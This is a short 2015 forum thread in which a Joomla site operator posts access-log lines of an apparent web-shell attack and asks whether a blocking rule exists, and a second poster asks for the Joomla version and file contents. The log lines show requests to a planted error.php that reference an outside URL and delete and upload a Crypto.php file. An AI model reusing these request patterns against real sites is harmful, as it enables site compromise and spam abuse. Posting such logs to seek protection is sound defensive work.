Is there any rule to block this?

sahostking · September 18, 2015, 5:05pm

Is ther eany rule that protects against this?

105.154.168.174 - - [18/Sep/2015:18:13:53 +0200] “GET /templates/beez3/error.php?http://www.permaya.org/x?&action=del&chdir=/home/sitedomain/public_html/layouts/plugins/user/profile/fields/&file=Crypto.php&type=file HTTP/1.1” 200 6950 “http://www.sitedomain.com/templates/beez3/error.php?http://www.permaya.org/x?&chdir=/home/ttautona/public_html/layouts/plugins/user/profile/fields/” “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0”
105.154.168.174 - - [18/Sep/2015:18:14:14 +0200] “POST /templates/beez3/error.php?http://www.permaya.org/x?&action=upload&chdir=/home/sitedomain/public_html/layouts/plugins/user/profile/fields/ HTTP/1.1” 200 8002 “http://www.sitedomain.com/templates/beez3/error.php?http://www.permaya.org/x?&action=del&chdir=/home/sitedomain/public_html/layouts/plugins/user/profile/fields/&file=Crypto.php&type=file” “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0”

It seems to upload Crypto.php for a Joomla site and then send out spam.

TDmitry · September 21, 2015, 9:16am

It looks like that this attack vector is unknown at this moment. Are you sure that such requests really upload Crypto.php? Can you provide additional information: Joomla! version, uploaded files, content of error.php file.